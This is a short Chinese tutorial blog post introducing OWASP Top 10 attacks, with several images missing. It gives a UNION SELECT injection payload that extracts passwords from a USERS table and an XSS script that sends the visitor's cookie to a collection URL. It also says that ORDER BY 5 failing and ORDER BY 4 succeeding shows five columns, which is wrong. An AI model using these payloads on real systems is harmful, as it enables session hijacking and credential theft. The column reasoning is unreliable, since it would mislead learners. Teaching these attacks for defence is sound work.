Java教程

OWASP TOP 10

本文主要是介绍OWASP TOP 10,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

在这里插入图片描述

SQL注入

如何发现SQL注入?

eg:
select * from table order by 5; ->无结果
select * from table order by 4; ->有结果
可知数据库表一共有五列

UNION SELECT
用法如:www.study.com/?id=1 UNION SELECT 1,2,3,PASSWORD FROM USERS

盲注

在这里插入图片描述

举例:
在这里插入图片描述
在这里插入图片描述
真返回1 假返回2

XSS攻击

跨站脚本攻击(cross site scripting) 不和层叠样式表CSS混淆,改为XSS
攻击者往web页面中插入恶意script代码,用户浏览网站时嵌入其中的script代码会自动执行,实现恶意攻击

session&cookie

x

XSS实例

<script>
     var cook=document.cookie;
     var img = '<img src = http://www.study.com/get.php?cook='+cook+'>';
     document.write(img);
</script>
这篇关于OWASP TOP 10的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!